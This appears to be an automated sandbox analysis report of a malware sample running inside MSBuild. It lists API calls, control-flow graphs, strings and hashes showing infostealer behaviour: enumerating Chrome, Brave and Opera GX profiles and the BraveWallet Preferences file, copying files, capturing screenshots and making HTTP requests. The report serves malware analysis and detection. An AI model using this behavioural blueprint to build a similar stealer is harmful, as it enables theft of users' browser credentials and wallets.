                                                                                        control_flow_graph 1889 40c2e0-40c368 call 40f810 call 40f940 call 40f9a0 call 40f8f0 call 40f890 * 2 call 40f810 * 2 call 40fa50 FindFirstFileA 1908 40cd1a-40cd73 call 40f890 * 10 1889->1908 1909 40c36e-40c37a 1889->1909 1910 40c380-40c394 StrCmpCA 1909->1910 1912 40ccf7-40cd0a FindNextFileA 1910->1912 1913 40c39a-40c3ae StrCmpCA 1910->1913 1912->1910 1917 40cd10-40cd14 FindClose 1912->1917 1913->1912 1916 40c3b4-40c428 call 40f8a0 call 40f940 call 40f9a0 * 2 call 40f8f0 call 40f890 * 3 1913->1916 1951 40c545-40c5ba call 40f9a0 * 4 call 40f8f0 call 40f890 * 3 1916->1951 1952 40c42e-40c454 call 40fa50 StrCmpCA 1916->1952 1917->1908 2001 40c5c0-40c5de call 40f890 call 40fa50 StrCmpCA 1951->2001 1957 40c456-40c4ca call 40f9a0 * 4 call 40f8f0 call 40f890 * 3 1952->1957 1958 40c4cf-40c543 call 40f9a0 * 4 call 40f8f0 call 40f890 * 3 1952->1958 1957->2001 1958->2001 2010 40c7a1-40c7b7 StrCmpCA 2001->2010 2011 40c5e4-40c5f8 StrCmpCA 2001->2011 2012 40c806-40c81b StrCmpCA 2010->2012 2013 40c7b9-40c7f6 call 401080 call 40f850 * 3 call 40bf30 2010->2013 2011->2010 2014 40c5fe-40c72f call 40f810 call 410b80 call 40f9a0 call 40f940 call 40f9a0 call 40f940 call 40f8f0 call 40f890 * 5 call 40fa50 * 2 CopyFileA call 40f810 call 40f9a0 * 2 call 40f8f0 call 40f890 * 2 call 40f850 call 406c20 2011->2014 2017 40c880-40c898 call 40f850 call 410d10 2012->2017 2018 40c81d-40c835 call 40fa50 StrCmpCA 2012->2018 2072 40c7fb-40c801 2013->2072 2215 40c731-40c76d call 40f850 call 401080 call 4142a0 call 40f890 2014->2215 2216 40c772-40c79c call 40fa50 DeleteFileA call 40fa00 call 40fa50 call 40f890 * 2 2014->2216 2043 40c8f5-40c90b StrCmpCA 2017->2043 2044 40c89a-40c89e 2017->2044 2027 40cc8b-40cc92 2018->2027 2028 40c83b-40c83f 2018->2028 2035 40cc94-40ccdc call 40f850 * 2 call 40f810 call 401080 call 40c2e0 2027->2035 2036 40cce7-40ccf2 call 40fa00 * 2 2027->2036 2028->2027 2032 40c845-40c87e call 401080 call 40f850 * 2 2028->2032 2085 40c8e0-40c8e5 call 40f850 call 407160 2032->2085 2100 40cce1 2035->2100 2036->1912 2049 40c911-40c9d7 call 40f810 call 410b80 call 40f9a0 call 40f940 call 40f9a0 call 40f940 call 40f8f0 call 40f890 * 5 call 40fa50 * 2 CopyFileA 2043->2049 2050 40caf2-40cb08 StrCmpCA 2043->2050 2044->2027 2052 40c8a4-40c8df call 401080 call 40f850 call 40f810 2044->2052 2165 40c9dd-40ca69 call 401080 call 40f850 * 3 call 407780 call 401080 call 40f850 * 3 call 4080a0 2049->2165 2166 40ca6f-40ca88 call 40fa50 StrCmpCA 2049->2166 2050->2027 2054 40cb0e-40cbd4 call 40f810 call 410b80 call 40f9a0 call 40f940 call 40f9a0 call 40f940 call 40f8f0 call 40f890 * 5 call 40fa50 * 2 CopyFileA 2050->2054 2052->2085 2171 40cbda-40cc18 call 401080 call 40f850 * 3 call 407ab0 2054->2171 2172 40cc6c-40cc7e call 40fa50 DeleteFileA call 40fa00 2054->2172 2072->2027 2106 40c8ea-40c8f0 2085->2106 2100->2036 2106->2027 2165->2166 2178 40cad3-40cae5 call 40fa50 DeleteFileA call 40fa00 2166->2178 2179 40ca8a-40cacd call 401080 call 40f850 * 3 call 4085f0 2166->2179 2225 40cc1d-40cc66 call 401080 call 40f850 * 3 call 407d70 2171->2225 2192 40cc83 2172->2192 2202 40caea-40caed 2178->2202 2179->2178 2198 40cc86 call 40f890 2192->2198 2198->2027 2202->2198 2215->2216 2216->2010 2225->2172
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,004201E9,004201E9,00000000,?,?,?,004234C0,004201E9,?,00000000,?), ref: 0040C35C
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 0040C38C
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 0040C3A6
                                                                                          • Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
                                                                                          • Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2
                                                                                        • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,004201E0,?,?,004201E9), ref: 0040C43F
                                                                                        • StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,004201E0,?,0169A250,?,004201E0,?,0169A1A0,00000000,?,?,?,004201E0), ref: 0040C5D6
                                                                                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040C5F0
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6B4
                                                                                        • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004201E9), ref: 0040C77B
                                                                                        • StrCmpCA.SHLWAPI(?,01699740), ref: 0040C7AF
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 0040BF30: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040BFD7
                                                                                          • Part of subcall function 0040BF30: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C00B
                                                                                          • Part of subcall function 0040C2E0: StrCmpCA.SHLWAPI(?,0169A1A0), ref: 0040C813
                                                                                          • Part of subcall function 0040C2E0: StrCmpCA.SHLWAPI(00000000,0169A250), ref: 0040C82D
                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0040CD02
                                                                                        • FindClose.KERNEL32(?), ref: 0040CD14
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Filelstrcpy$CopyFind$lstrcatlstrlen$CloseDeleteFirstNext
                                                                                        • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                        • API String ID: 480569104-1189830961
                                                                                        • Opcode ID: 1b104ade175e4c79d037078ebf40eb43ea0de751dbf22e7c923f55d6729e68dd
                                                                                        • Instruction ID: cbba04a03a0008995a9987146006101dde6cfe135f2cf04865d7d56680781c26
                                                                                        • Opcode Fuzzy Hash: 1b104ade175e4c79d037078ebf40eb43ea0de751dbf22e7c923f55d6729e68dd
                                                                                        • Instruction Fuzzy Hash: 8B522D72910108ABCB24FB71DC56EEE7379AB54304F40857EF906B25D1EF386A4CCAA5
                                                                                        Function 6C5635A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2659 6c5635a0-6c5635be 2660 6c5635c4-6c5635ed InitializeCriticalSectionAndSpinCount getenv 2659->2660 2661 6c5638e9-6c5638fb call 6c59b320 2659->2661 2663 6c5635f3-6c5635f5 2660->2663 2664 6c5638fc-6c56390c strcmp 2660->2664 2667 6c5635f8-6c563614 QueryPerformanceFrequency 2663->2667 2664->2663 2666 6c563912-6c563922 strcmp 2664->2666 2670 6c563924-6c563932 2666->2670 2671 6c56398a-6c56398c 2666->2671 2668 6c56374f-6c563756 2667->2668 2669 6c56361a-6c56361c 2667->2669 2674 6c56396e-6c563982 2668->2674 2675 6c56375c-6c563768 2668->2675 2672 6c563622-6c56364a _strnicmp 2669->2672 2673 6c56393d 2669->2673 2670->2672 2676 6c563938 2670->2676 2671->2667 2677 6c563944-6c563957 _strnicmp 2672->2677 2678 6c563650-6c56365e 2672->2678 2673->2677 2674->2671 2679 6c56376a-6c5637a1 QueryPerformanceCounter EnterCriticalSection 2675->2679 2676->2668 2677->2678 2681 6c56395d-6c56395f 2677->2681 2680 6c563664-6c5636a9 GetSystemTimeAdjustment 2678->2680 2678->2681 2682 6c5637b3-6c5637eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2679->2682 2683 6c5637a3-6c5637b1 2679->2683 2684 6c563964 2680->2684 2685 6c5636af-6c563749 call 6c59c110 2680->2685 2686 6c5637fc-6c563839 LeaveCriticalSection 2682->2686 2687 6c5637ed-6c5637fa 2682->2687 2683->2682 2684->2674 2685->2668 2689 6c563846-6c5638ac call 6c59c110 2686->2689 2690 6c56383b-6c563840 2686->2690 2687->2686 2694 6c5638b2-6c5638ca 2689->2694 2690->2679 2690->2689 2695 6c5638cc-6c5638db 2694->2695 2696 6c5638dd-6c5638e3 2694->2696 2695->2694 2695->2696 2696->2661
                                                                                        APIs
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C5EF688,00001000), ref: 6C5635D5
                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5635E0
                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 6C5635FD
                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C56363F
                                                                                        • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C56369F
                                                                                        • __aulldiv.LIBCMT ref: 6C5636E4
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C563773
                                                                                        • EnterCriticalSection.KERNEL32(6C5EF688), ref: 6C56377E
                                                                                        • LeaveCriticalSection.KERNEL32(6C5EF688), ref: 6C5637BD
                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C5637C4
                                                                                        • EnterCriticalSection.KERNEL32(6C5EF688), ref: 6C5637CB
                                                                                        • LeaveCriticalSection.KERNEL32(6C5EF688), ref: 6C563801
                                                                                        • __aulldiv.LIBCMT ref: 6C563883
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C563902
                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C563918
                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C56394C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2382968484.000000006C561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C560000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2382937491.000000006C560000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2383501124.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2383594395.000000006C5EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2383635275.000000006C5F2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c560000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                        • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                        • API String ID: 301339242-3790311718
                                                                                        • Opcode ID: 51f26ec6d8110b69a95cc948828a8662ef418edf171e465009b1aedade76fc92
                                                                                        • Instruction ID: 0c7caf911d8f142f4d7d8f97e1338ebd902a57981a2e469cd841cf4ed2ca025d
                                                                                        • Opcode Fuzzy Hash: 51f26ec6d8110b69a95cc948828a8662ef418edf171e465009b1aedade76fc92
                                                                                        • Instruction Fuzzy Hash: 0FB1C6B1B093109FDB48DF29DC4461ABBF5BB8E704F068A2DE499D7760DB709900CB89
                                                                                        Function 00415EA0 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 227stringfileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 00415EBC
                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00415ED3
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 00415EFC
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 00415F16
                                                                                        • wsprintfA.USER32 ref: 00415F3B
                                                                                        • StrCmpCA.SHLWAPI(?,004201E9), ref: 00415F4A
                                                                                        • wsprintfA.USER32 ref: 00415F67
                                                                                        • wsprintfA.USER32 ref: 00415F86
                                                                                        • PathMatchSpecA.SHLWAPI(?,?), ref: 00415F97
                                                                                        • lstrcatA.KERNEL32(?,0169A440,?,000003E8), ref: 00415FC3
                                                                                        • lstrcatA.KERNEL32(?,004201E0), ref: 00415FD5
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415FE3
                                                                                        • lstrcatA.KERNEL32(?,004201E0), ref: 00415FF5
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00416009
                                                                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004160AA
                                                                                        • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004201E9), ref: 00416119
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                          • Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                          • Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00416160
                                                                                        • FindClose.KERNEL32(?), ref: 00416172
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$Filewsprintf$Find$CloseCopyCreateDeleteFirstMatchNextObjectPathSingleSleepSpecThreadWaitlstrcpy
                                                                                        • String ID: %s\%s$%s\*
                                                                                        • API String ID: 103870964-2848263008
                                                                                        • Opcode ID: 17b6025013d19771342505bce037e7501b215a9a2c06ee1d8103fd0691f27d35
                                                                                        • Instruction ID: 4f3ba6799c96e4c8b2fdef7625ad27d3c1a7b3744a2bb23c5cf2dc8a64d10888
                                                                                        • Opcode Fuzzy Hash: 17b6025013d19771342505bce037e7501b215a9a2c06ee1d8103fd0691f27d35
                                                                                        • Instruction Fuzzy Hash: AA818472A10218ABCB24FBB1DC45DEE777DBF44304F44557AF506A2091EF38AA48CBA5
                                                                                        Function 00411530 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 174windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 0041159C
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004115A9
                                                                                        • GetDC.USER32(00000000), ref: 004115B0
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004115B9
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004115CA
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004115D5
                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 004115F5
                                                                                        • GlobalFix.KERNEL32(00000043), ref: 0041165B
                                                                                        • GlobalSize.KERNEL32(00000043), ref: 00411668
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CompatibleCreateGlobalWindow$BitmapDesktopObjectRectSelectSize
                                                                                        • String ID: image/jpeg$poAC$poAC
                                                                                        • API String ID: 536084594-2740837080
                                                                                        • Opcode ID: 9371277ee36957b3521b6ffa37a4afbb8a9808b039b2cf45441d82480e80f604
                                                                                        • Instruction ID: defcd3f450e1372c84fb34f4d7ba74a0fd3369ce25f5533fa2b14cfeea203380
                                                                                        • Opcode Fuzzy Hash: 9371277ee36957b3521b6ffa37a4afbb8a9808b039b2cf45441d82480e80f604
                                                                                        • Instruction Fuzzy Hash: 275133B6900208AFDB14EFB5DC49EEE77BDEF88711F005529FA01E2290DB3499448BA4
                                                                                        Function 0041BD50 Relevance: 25.1, APIs: 12, Strings: 2, Instructions: 634COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: /$UT
                                                                                        • API String ID: 0-1626504983
                                                                                        • Opcode ID: f1844ba8d307be4bb8c9dfc5fa30b6fb925a5f90da864f4c250fcf0ebdf003f7
                                                                                        • Instruction ID: fc7b41ddac4b8287914dd5b35c20cb5f85a9e29a538cbd7399227cbcd4b87930
                                                                                        • Opcode Fuzzy Hash: f1844ba8d307be4bb8c9dfc5fa30b6fb925a5f90da864f4c250fcf0ebdf003f7
                                                                                        • Instruction Fuzzy Hash: 30420571A003598BCB25CF69DC807EEBBB5FF89304F1480AEE84897341D7389A95CB94
                                                                                        Function 00405010 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 174networkfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
                                                                                          • Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
                                                                                          • Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405062
                                                                                        • StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,?), ref: 0040507A
                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A2
                                                                                        • HttpOpenRequestA.WININET(00000000,GET,?,0169B128,00000000,00000000,-00400100,00000000), ref: 004050DC
                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405100
                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040510F
                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040512E
                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405177
                                                                                        • InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 004051C5
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004051D0
                                                                                        • InternetCloseHandle.WININET(?), ref: 004051DA
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 004051E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseHandleHttp$FileOpenReadRequestlstrcpy$ConnectCrackInfoOptionQuerySendlstrlen
                                                                                        • String ID: ERROR$GET
                                                                                        • API String ID: 1863336362-3591763792
                                                                                        • Opcode ID: 0f67009fbf7cbbc68c08b1a8f3387cfa7beef474e4c265804f63dc4e633702b9
                                                                                        • Instruction ID: 1ac627e5dad41aa046ddd859517fa52cc070feb9a932d89590bb6b8620beea7d
                                                                                        • Opcode Fuzzy Hash: 0f67009fbf7cbbc68c08b1a8f3387cfa7beef474e4c265804f63dc4e633702b9
                                                                                        • Instruction Fuzzy Hash: 1F515472A406186BEB20EB64DC46FEF7779EF44700F104139F605BB2D1DB786A058BA9
                                                                                        Function 00401110 Relevance: 23.4, APIs: 12, Strings: 1, Instructions: 658fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004201E0,?,00401CE9,?,004201E0,?,?,00000000,?,00000000), ref: 004012D9
                                                                                        • StrCmpCA.SHLWAPI(?,004201DC), ref: 004012FC
                                                                                        • StrCmpCA.SHLWAPI(?,004201D8), ref: 00401316
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,?,?,?,004201E0,?,00401CE9,?,004201E0,?,?,?,004201E0,?,?), ref: 0040140D
                                                                                          • Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00401668
                                                                                        • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 004016A4
                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004016B3
